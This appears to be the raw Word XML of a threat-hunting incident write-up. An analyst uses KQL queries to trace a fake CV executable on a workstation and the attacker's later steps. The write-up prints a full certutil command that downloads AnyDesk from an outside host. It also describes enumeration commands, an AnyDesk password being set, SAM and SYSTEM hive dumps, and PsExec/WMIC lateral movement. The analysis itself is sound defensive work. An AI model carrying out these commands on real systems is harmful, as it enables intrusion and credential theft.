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FB3171" wp14:paraId="5C27533E" wp14:textId="5C773B19">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2DDA9621">
        <w:rPr/>
        <w:t>Original Alert</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="65FB3171" wp14:paraId="2C078E63" wp14:textId="10FA658F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2DDA9621">
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="5F323368" wp14:anchorId="7ECB43E2">
            <wp:extent cx="5943600" cy="3962400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1168298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298481" name="Picture 1168298481"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId691853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A9621" w:rsidP="65FB3171" w:rsidRDefault="2DDA9621" w14:paraId="7E76FB19" w14:textId="1F6A3A9B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2DDA9621">
        <w:rPr/>
        <w:t>Alert:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2DDA9621" w:rsidP="65FB3171" w:rsidRDefault="2DDA9621" w14:paraId="1405205F" w14:textId="56FF63B3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2DDA9621">
        <w:drawing>
          <wp:inline wp14:editId="196C8775" wp14:anchorId="431AD562">
            <wp:extent cx="5943600" cy="3171825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="154692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921964" name="Picture 1546921964"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1779898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B3171" w:rsidP="65FB3171" w:rsidRDefault="65FB3171" w14:paraId="3DA41CBD" w14:textId="17676356">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="6FE0E061" w:rsidP="65FB3171" w:rsidRDefault="6FE0E061" w14:paraId="6B8EBBC2" w14:textId="21686883">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="6FE0E061">
        <w:rPr/>
        <w:t>Investigation beginning :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6FE0E061" w:rsidP="65FB3171" w:rsidRDefault="6FE0E061" w14:paraId="0428BF83" w14:textId="222BE767">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="6FE0E061">
        <w:rPr/>
        <w:t>User – Sophie.Turner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6FE0E061" w:rsidP="65FB3171" w:rsidRDefault="6FE0E061" w14:paraId="14308AFC" w14:textId="7707C513">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="6FE0E061">
        <w:rPr/>
        <w:t>DeviceName</w:t>
      </w:r>
      <w:r w:rsidR="6FE0E061">
        <w:rPr/>
        <w:t xml:space="preserve"> – as=pc1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="65FB3171" w:rsidP="65FB3171" w:rsidRDefault="65FB3171" w14:paraId="2C205E45" w14:textId="0EA87B47">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="02DFFCB7" w:rsidP="65FB3171" w:rsidRDefault="02DFFCB7" w14:paraId="4E338472" w14:textId="30E09BB1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="02DFFCB7">
        <w:rPr/>
        <w:t>KQL Query:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02DFFCB7" w:rsidP="65FB3171" w:rsidRDefault="02DFFCB7" w14:paraId="071C1F3A" w14:textId="7A8699F7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="02DFFCB7">
        <w:rPr/>
        <w:t>Initial search on user and device</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02DFFCB7" w:rsidP="65FB3171" w:rsidRDefault="02DFFCB7" w14:paraId="2BDAACE5" w14:textId="23DF212E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="02DFFCB7">
        <w:rPr/>
        <w:t>DeviceProcessEvents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02DFFCB7" w:rsidP="65FB3171" w:rsidRDefault="02DFFCB7" w14:paraId="5F181D95" w14:textId="2C541F20">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="02DFFCB7">
        <w:rPr/>
        <w:t>| where DeviceName =~ "as-pc1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02DFFCB7" w:rsidP="65FB3171" w:rsidRDefault="02DFFCB7" w14:paraId="1DCC00E3" w14:textId="469164B1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="02DFFCB7">
        <w:rPr/>
        <w:t>| where AccountName =~ "Sophie.Turner"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02DFFCB7" w:rsidP="65FB3171" w:rsidRDefault="02DFFCB7" w14:paraId="33F4118D" w14:textId="42FA554B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="02DFFCB7">
        <w:rPr/>
        <w:t>| project Timestamp,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02DFFCB7" w:rsidP="65FB3171" w:rsidRDefault="02DFFCB7" w14:paraId="76719DED" w14:textId="1AEDC1FF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="02DFFCB7">
        <w:rPr/>
        <w:t xml:space="preserve">          DeviceName,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02DFFCB7" w:rsidP="65FB3171" w:rsidRDefault="02DFFCB7" w14:paraId="4526F921" w14:textId="124467E9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="02DFFCB7">
        <w:rPr/>
        <w:t xml:space="preserve">          AccountName,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02DFFCB7" w:rsidP="65FB3171" w:rsidRDefault="02DFFCB7" w14:paraId="715EF7D1" w14:textId="359CAADC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="02DFFCB7">
        <w:rPr/>
        <w:t xml:space="preserve">          FileName,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02DFFCB7" w:rsidP="65FB3171" w:rsidRDefault="02DFFCB7" w14:paraId="30EB5C98" w14:textId="56EE3811">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="02DFFCB7">
        <w:rPr/>
        <w:t xml:space="preserve">          FolderPath,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02DFFCB7" w:rsidP="65FB3171" w:rsidRDefault="02DFFCB7" w14:paraId="3373B879" w14:textId="3ABFC541">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="02DFFCB7">
        <w:rPr/>
        <w:t xml:space="preserve">          ProcessCommandLine,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02DFFCB7" w:rsidP="65FB3171" w:rsidRDefault="02DFFCB7" w14:paraId="773C75DA" w14:textId="66A3CF79">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="02DFFCB7">
        <w:rPr/>
        <w:t xml:space="preserve">          InitiatingProcessFileName,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02DFFCB7" w:rsidP="65FB3171" w:rsidRDefault="02DFFCB7" w14:paraId="6DDB7528" w14:textId="5C7CB17D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="02DFFCB7">
        <w:rPr/>
        <w:t xml:space="preserve">          InitiatingProcessCommandLine,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02DFFCB7" w:rsidP="65FB3171" w:rsidRDefault="02DFFCB7" w14:paraId="4DCB7CAB" w14:textId="06D614E6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="02DFFCB7">
        <w:rPr/>
        <w:t xml:space="preserve">          SHA256</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02DFFCB7" w:rsidP="65FB3171" w:rsidRDefault="02DFFCB7" w14:paraId="575A014B" w14:textId="28C7C6AB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="02DFFCB7">
        <w:rPr/>
        <w:t>| order by Timestamp desc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A782A6" w:rsidP="65FB3171" w:rsidRDefault="00A782A6" w14:paraId="49E318F7" w14:textId="098269F0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="00A782A6">
        <w:rPr/>
        <w:t>2026-01-15T03:58:55.6563735</w:t>
      </w:r>
      <w:r w:rsidR="00A782A6">
        <w:rPr/>
        <w:t xml:space="preserve">Z  - </w:t>
      </w:r>
      <w:r w:rsidR="40834189">
        <w:rPr/>
        <w:t>Scrolling through the logs I notice enumeration being done by “daniel_richardson_cv.pdf.exe” which is an executable file disguised as a PDF.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="40834189" w:rsidP="65FB3171" w:rsidRDefault="40834189" w14:paraId="5F4B48E2" w14:textId="533D2DF8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="40834189">
        <w:drawing>
          <wp:inline wp14:editId="58DD8DD1" wp14:anchorId="4270C079">
            <wp:extent cx="5943600" cy="1562100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="199289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89834" name="Picture 199289834"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2014268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3DF96" w:rsidP="65FB3171" w:rsidRDefault="0AC3DF96" w14:paraId="3885BC61" w14:textId="2DB0116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B3171" w:rsidR="0AC3DF96">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>KQLQuery:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="748624F2" w:rsidP="65FB3171" w:rsidRDefault="748624F2" w14:paraId="14F6B644" w14:textId="222BF19E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DeviceProcessEvents </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="748624F2" w:rsidP="65FB3171" w:rsidRDefault="748624F2" w14:paraId="083AF767" w14:textId="592F6170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where DeviceName =~ "as-pc1" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="748624F2" w:rsidP="65FB3171" w:rsidRDefault="748624F2" w14:paraId="0126D853" w14:textId="4003D607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where AccountName =~ "Sophie.Turner" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="748624F2" w:rsidP="65FB3171" w:rsidRDefault="748624F2" w14:paraId="44599884" w14:textId="488F4FA0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>| where InitiatingProcessFileName =~ "Daniel_Richardson_CV.pdf.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="748624F2" w:rsidP="65FB3171" w:rsidRDefault="748624F2" w14:paraId="7E150952" w14:textId="4D4138CD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| project Timestamp, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="748624F2" w:rsidP="65FB3171" w:rsidRDefault="748624F2" w14:paraId="07A042B8" w14:textId="68311E78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DeviceName, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="748624F2" w:rsidP="65FB3171" w:rsidRDefault="748624F2" w14:paraId="10B1E50F" w14:textId="334B8632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AccountName, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="748624F2" w:rsidP="65FB3171" w:rsidRDefault="748624F2" w14:paraId="48B4D09A" w14:textId="78EB93F4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FileName, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="748624F2" w:rsidP="65FB3171" w:rsidRDefault="748624F2" w14:paraId="210D05B3" w14:textId="58FA0795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FolderPath, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="748624F2" w:rsidP="65FB3171" w:rsidRDefault="748624F2" w14:paraId="1479C006" w14:textId="076AC4B9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ProcessCommandLine, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="748624F2" w:rsidP="65FB3171" w:rsidRDefault="748624F2" w14:paraId="62215D13" w14:textId="291E1C3B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SHA256,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="748624F2" w:rsidP="65FB3171" w:rsidRDefault="748624F2" w14:paraId="13D3E1BB" w14:textId="4488280A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InitiatingProcessFileName, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="748624F2" w:rsidP="65FB3171" w:rsidRDefault="748624F2" w14:paraId="39B7A56C" w14:textId="3F91498E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InitiatingProcessCommandLine, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="748624F2" w:rsidP="65FB3171" w:rsidRDefault="748624F2" w14:paraId="5B6D88F8" w14:textId="195108BD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InitiatingProcessSHA256,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="748624F2" w:rsidP="65FB3171" w:rsidRDefault="748624F2" w14:paraId="4D0D92B8" w14:textId="029A072E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InitiatingProcessId,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="748624F2" w:rsidP="65FB3171" w:rsidRDefault="748624F2" w14:paraId="0BE3A928" w14:textId="5894DBF7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InitiatingProcessParentFileName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="748624F2" w:rsidP="65FB3171" w:rsidRDefault="748624F2" w14:paraId="46E17630" w14:textId="26E1BBDB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="65FB3171" w:rsidR="748624F2">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>| order by Timestamp desc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="65FB3171" w:rsidP="65FB3171" w:rsidRDefault="65FB3171" w14:paraId="6FC6B3AD" w14:textId="19E3BB3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C3DF96" w:rsidP="65FB3171" w:rsidRDefault="0AC3DF96" w14:paraId="248BAB3B" w14:textId="3C8213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B3171" w:rsidR="0AC3DF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5FB3171" w:rsidR="0AC3DF96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5FB3171" w:rsidR="0AC3DF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payload from daniel_richardson_cv.pdf.exe has a SHA256 of 48b97fd91946e81e3e7742b3554585360551551cbf9398e1f34f4bc4eac3a6b5</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="090FFF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</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="090FFFFF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ProcessID</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="090FFF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4</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="05A28843">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>94</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="090FFFFF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 w:rsidRPr="65FB3171" w:rsidR="070D4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</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="070D49DE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5FB3171" w:rsidR="070D4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Parent Process was explorer.exe which </w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="070D49DE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65FB3171" w:rsidR="070D49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ran it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="070D49DE" w:rsidP="65FB3171" w:rsidRDefault="070D49DE" w14:paraId="2014DCB7" w14:textId="08FD19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70D49DE">
        <w:drawing>
          <wp:inline wp14:editId="5A26FDA7" wp14:anchorId="442CB4F0">
            <wp:extent cx="5943600" cy="1657350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37931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314477" name="Picture 379314477"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId121891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16C1B" w:rsidP="65FB3171" w:rsidRDefault="3D116C1B" w14:paraId="2901AA50" w14:textId="5CF367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B3171" w:rsidR="3D116C1B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2026-01-15T03:58:55.6563735Z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7FF15E3B" w:rsidP="65FB3171" w:rsidRDefault="7FF15E3B" w14:paraId="18DFEF7B" w14:textId="3F3351AF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="65FB3171" w:rsidR="7FF15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there, the attacker </w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="7FF15E3B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enumerates</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="7FF15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network by </w:t>
      </w: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>using commands including:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4E164B04" w:rsidP="65FB3171" w:rsidRDefault="4E164B04" w14:paraId="5864F0FF" w14:textId="4D24F102">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pP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>WhoAmI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4E164B04" w:rsidP="65FB3171" w:rsidRDefault="4E164B04" w14:paraId="31D55A2D" w14:textId="6F0CC539">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pP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>Hostname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4E164B04" w:rsidP="65FB3171" w:rsidRDefault="4E164B04" w14:paraId="36E88AD8" w14:textId="5DCDAFB6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pP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>Net.exe user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4E164B04" w:rsidP="65FB3171" w:rsidRDefault="4E164B04" w14:paraId="3F996AE1" w14:textId="42B4BDD6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pP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Net.exe </w:t>
      </w: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>localgroup</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="4E164B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administrators</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7FF25FB1" w:rsidP="65FB3171" w:rsidRDefault="7FF25FB1" w14:paraId="56B3F484" w14:textId="0DA1B6F2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="65FB3171" w:rsidR="7FF25FB1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Net.exe view</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="7FF15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7FF15E3B">
        <w:drawing>
          <wp:inline wp14:editId="5189BDDC" wp14:anchorId="7D55BF64">
            <wp:extent cx="5943600" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1946518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18578" name="Picture 1946518578"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2070706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84134" w:rsidP="65FB3171" w:rsidRDefault="40984134" w14:paraId="20BBCB72" w14:textId="1122FDA4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="40984134">
        <w:rPr/>
        <w:t>At 2026-01-15T04:08:29.4839157Z,</w:t>
      </w:r>
      <w:r w:rsidR="09E6FF3C">
        <w:rPr/>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="40984134">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="40984134">
        <w:rPr/>
        <w:t>Certutil</w:t>
      </w:r>
      <w:r w:rsidR="40984134">
        <w:rPr/>
        <w:t xml:space="preserve"> was </w:t>
      </w:r>
      <w:r w:rsidR="40984134">
        <w:rPr/>
        <w:t>utilized</w:t>
      </w:r>
      <w:r w:rsidR="40984134">
        <w:rPr/>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="49EEDDD3">
        <w:rPr/>
        <w:t xml:space="preserve">download </w:t>
      </w:r>
      <w:r w:rsidR="40984134">
        <w:rPr/>
        <w:t>AnyDesk</w:t>
      </w:r>
      <w:r w:rsidR="40984134">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="741386A1">
        <w:rPr/>
        <w:t>to C:\Users\Public\</w:t>
      </w:r>
      <w:r w:rsidR="741386A1">
        <w:rPr/>
        <w:t>AnyDesk</w:t>
      </w:r>
      <w:r w:rsidR="741386A1">
        <w:rPr/>
        <w:t>.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="40984134" w:rsidP="65FB3171" w:rsidRDefault="40984134" w14:paraId="76FCB9AE" w14:textId="2514E2C3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="40984134">
        <w:rPr/>
        <w:t>cmd.exe /c "</w:t>
      </w:r>
      <w:r w:rsidR="40984134">
        <w:rPr/>
        <w:t>certutil</w:t>
      </w:r>
      <w:r w:rsidR="40984134">
        <w:rPr/>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="40984134">
        <w:rPr/>
        <w:t>urlcache</w:t>
      </w:r>
      <w:r w:rsidR="40984134">
        <w:rPr/>
        <w:t xml:space="preserve"> -split -f https://download.anydesk.com/AnyDesk.exe C:\Users\Public\AnyDesk.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4E1537E5" w:rsidP="65FB3171" w:rsidRDefault="4E1537E5" w14:paraId="3A1CBF77" w14:textId="246987FA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="4E1537E5">
        <w:rPr/>
        <w:t>At 2026-01-15T04:08:29.4839157</w:t>
      </w:r>
      <w:r w:rsidR="4E1537E5">
        <w:rPr/>
        <w:t>Z ,</w:t>
      </w:r>
      <w:r w:rsidR="4E1537E5">
        <w:rPr/>
        <w:t xml:space="preserve"> a password of “intrud3r” was set as the password for </w:t>
      </w:r>
      <w:r w:rsidR="4E1537E5">
        <w:rPr/>
        <w:t>AnyDesk</w:t>
      </w:r>
      <w:r w:rsidR="3B3850C6">
        <w:rPr/>
        <w:t xml:space="preserve"> at location:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B3850C6" w:rsidP="65FB3171" w:rsidRDefault="3B3850C6" w14:paraId="0BA16340" w14:textId="378373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B3171" w:rsidR="3B3850C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C:\Users\Sophie.Turner\AppData\Roaming\AnyDesk\system.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="65FB3171" w:rsidP="65FB3171" w:rsidRDefault="65FB3171" w14:paraId="53617B77" w14:textId="0D099200">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3798A1AF" w:rsidP="65FB3171" w:rsidRDefault="3798A1AF" w14:paraId="66ADA4BE" w14:textId="4CBB32D8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3798A1AF">
        <w:drawing>
          <wp:inline wp14:editId="2180C776" wp14:anchorId="250BAFF5">
            <wp:extent cx="5943600" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="978006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006692" name="Picture 978006692"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1688428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65677" w:rsidP="65FB3171" w:rsidRDefault="28065677" w14:paraId="58EDD420" w14:textId="0149B0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="28065677">
        <w:rPr/>
        <w:t xml:space="preserve">At 2026-01-15T04:13:32.7652183Z, the user saved </w:t>
      </w:r>
      <w:r w:rsidR="6D8E45EC">
        <w:rPr/>
        <w:t xml:space="preserve">Credential Stores </w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="2806567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HKLM\SAM and HKLM\SYSTEM to C:\Users\Public\sam.hiv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="481C04C6" w:rsidP="65FB3171" w:rsidRDefault="481C04C6" w14:paraId="417CD31B" w14:textId="52E8888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1C04C6">
        <w:drawing>
          <wp:inline wp14:editId="57D6BF23" wp14:anchorId="7A299380">
            <wp:extent cx="5943600" cy="533400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1441122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22373" name="Picture 1441122373"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1732154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DE3F6" w:rsidP="65FB3171" w:rsidRDefault="249DE3F6" w14:paraId="771FB662" w14:textId="17D065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="249DE3F6">
        <w:rPr/>
        <w:t xml:space="preserve">Beginning </w:t>
      </w:r>
      <w:r w:rsidR="249DE3F6">
        <w:rPr/>
        <w:t xml:space="preserve">at </w:t>
      </w:r>
      <w:r w:rsidR="1C1981F9">
        <w:rPr/>
        <w:t>2026-01-15T04:20:53.1215845Z</w:t>
      </w:r>
      <w:r w:rsidR="249DE3F6">
        <w:rPr/>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="249DE3F6">
        <w:rPr/>
        <w:t xml:space="preserve"> WMIC and </w:t>
      </w:r>
      <w:r w:rsidR="249DE3F6">
        <w:rPr/>
        <w:t>PSExec</w:t>
      </w:r>
      <w:r w:rsidR="249DE3F6">
        <w:rPr/>
        <w:t xml:space="preserve"> was </w:t>
      </w:r>
      <w:r w:rsidR="249DE3F6">
        <w:rPr/>
        <w:t>attempt</w:t>
      </w:r>
      <w:r w:rsidR="130EDC5F">
        <w:rPr/>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="130EDC5F">
        <w:rPr/>
        <w:t xml:space="preserve"> to be used to laterally move to </w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="130EDC5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AS-PC2</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="3F45C6D9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 user “Administrator”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="249DE3F6" w:rsidP="65FB3171" w:rsidRDefault="249DE3F6" w14:paraId="0CFB8A5E" w14:textId="603700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49DE3F6">
        <w:drawing>
          <wp:inline wp14:editId="1C7BCB3B" wp14:anchorId="37CF4926">
            <wp:extent cx="5943600" cy="1209675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1801049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049158" name="Picture 1801049158"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId196570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5BC84" w:rsidP="65FB3171" w:rsidRDefault="1C25BC84" w14:paraId="6E9617D6" w14:textId="1652BA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25BC84">
        <w:rPr/>
        <w:t xml:space="preserve">2026-01-15T04:27:14.3753192Z  - </w:t>
      </w:r>
      <w:r w:rsidR="4BC54C03">
        <w:rPr/>
        <w:t xml:space="preserve">The attacker then performed further enumeration by </w:t>
      </w:r>
      <w:r w:rsidR="4BC54C03">
        <w:rPr/>
        <w:t>executiving</w:t>
      </w:r>
      <w:r w:rsidR="4BC54C03">
        <w:rPr/>
        <w:t xml:space="preserve"> “Arp –a” and “net view”</w:t>
      </w:r>
    </w:p>
